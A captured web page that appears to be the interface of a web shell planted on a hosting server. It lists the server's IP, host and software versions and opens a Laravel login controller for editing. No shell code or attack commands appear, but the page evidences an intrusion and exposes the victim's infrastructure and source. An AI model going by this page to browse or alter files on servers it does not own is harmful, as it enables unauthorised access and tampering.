One Hat Cyber Team

Your IP : 18.225.95.116

Server IP : 192.145.235.60

Server : Linux ngx365.inmotionhosting.com 5.14.0-427.33.1.el9_4.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Aug 30 09:45:56 EDT 2024 x86_64

Server Software : Apache

PHP Version : 8.2.27

Buat File | Buat Folder

Dir : ~/home/centos12/www/centosuit/app/Http/Controllers/

Edit File: LoginController.php

<?php

namespace App\Http\Controllers;

use Exception;
use App\Models\User;
use App\Helper\Reply;
use App\Models\Social;
use App\Models\UserAuth;
use Illuminate\Http\Request;
use Laravel\Fortify\Fortify;
use App\Events\TwoFactorCodeEvent;
use App\Traits\SocialAuthSettings;
use Froiden\Envato\Traits\AppBoot;
use Illuminate\Support\Facades\DB;
use App\Http\Requests\LoginRequest;
use Illuminate\Support\Facades\Auth;
use App\Providers\RouteServiceProvider;
use Laravel\Socialite\Facades\Socialite;
use \Illuminate\Validation\ValidationException;

class LoginController extends Controller
{

use AppBoot, SocialAuthSettings;

protected $redirectTo = 'account/dashboard';

public function checkEmail(LoginRequest $request)
    {
        $user = UserAuth::where('email', $request->email)->first();

if (is_null($user)) {
            throw ValidationException::withMessages([
                Fortify::username() => __('messages.invalidOrInactiveAccount'),
            ]);
        }

return response([
            'status' => 'success'
        ]);
    }

public function checkCode(Request $request)
    {
        $request->validate([
            'code' => 'required',
        ]);

$user = UserAuth::findOrFail($request->user_id);

if ($request->code == $user->two_factor_code) {

// Reset codes and expire_at after verification
            $user->resetTwoFactorCode();

// Attempt login
            Auth::login($user);

// WORKSUITESAAS
            if ($user->user->is_superadmin) {
                return redirect()->route('superadmin.super_admin_dashboard');
            }

return redirect()->route('dashboard');
        }

// Reset codes and expire_at after failure
        $user->resetTwoFactorCode();

return redirect()->back()->withErrors(['two_factor_code' => __('messages.codeNotMatch')]);
    }

public function resendCode(Request $request)
    {
        $userAuth = UserAuth::findOrFail($request->user_id);
        $userAuth->generateTwoFactorCode();
        event(new TwoFactorCodeEvent($userAuth->user));

return Reply::success(__('messages.codeSent'));
    }

public function redirect($provider)
    {
        $this->setSocailAuthConfigs();

return Socialite::driver($provider)->redirect();
    }

public function callback(Request $request, $provider)
    {
        $this->setSocailAuthConfigs();

try {
            try {
                if ($provider != 'twitter' && $provider != 'linkedin') {
                    $data = Socialite::driver($provider)->stateless()->user();
                    /* @phpstan-ignore-line */
                }
                elseif ($provider == 'twitter') {
                    $data = Socialite::driver('twitter-oauth-2')->user(); /* @phpstan-ignore-line */
                }
                elseif ($provider == 'linkedin') {
                    $data = Socialite::driver('linkedin-openid')->user(); /* @phpstan-ignore-line */
                }
                else {
                    $data = Socialite::driver($provider)->user();
                }
            } catch (Exception $e) {

return redirect()->route('login')->with(['message' => $e->getMessage()]);
            }

if ($provider == 'twitter') {
                $user = UserAuth::where(['twitter_id' => $data->id])->first();
            }
            else {
                $user = UserAuth::where(['email' => $data->email])->first();
            }

if (!$user) {
                return redirect()->route('login')->with(['message' => __('messages.unAuthorisedUser')]);
            }

if ($user->status === 'deactive') {
                return redirect()->route('login')->with(['message' => __('auth.failedBlocked')]);
            }

if ($user->login === 'disable') {
                return redirect()->route('login')->with(['message' => __('auth.failedLoginDisabled')]);
            }

// User found
            DB::beginTransaction();

Social::updateOrCreate(['user_id' => $user->id], [
                'social_id' => $data->id,
                'social_service' => $provider,
            ]);

DB::commit();

Auth::login($user, true);

return redirect()->intended($this->redirectPath());

} catch (Exception $e) {

return redirect()->route('login')->with(['message' => $e->getMessage()]);
        }
    }

public function redirectPath()
    {

if (isWorksuiteSaas()) {
            session(['user' => User::find(user()->id)]);

if (auth()->user() && auth()->user()->user->is_superadmin) {
                return (session()->has('url.intended') ? session()->get('url.intended') : RouteServiceProvider::SUPER_ADMIN_HOME);
            }

$emailCountInCompanies = DB::table('users')->where('email', user()->email)->count();
            session()->forget('user_company_count');

if ($emailCountInCompanies > 1) {
                if (module_enabled('Subdomain')) {
                    UserAuth::multipleUserLoginSubdomain();
                }
                else {
                    session(['user_company_count' => $emailCountInCompanies]);

return route('superadmin.superadmin.workspaces');
                }

}

return (session()->has('url.intended') ? session()->get('url.intended') : RouteServiceProvider::HOME);
        }

if (method_exists($this, 'redirectTo')) {
            return $this->redirectTo();
        }

return property_exists($this, 'redirectTo') ? $this->redirectTo : '/login';
    }

public function username()
    {
        return 'email';
    }

}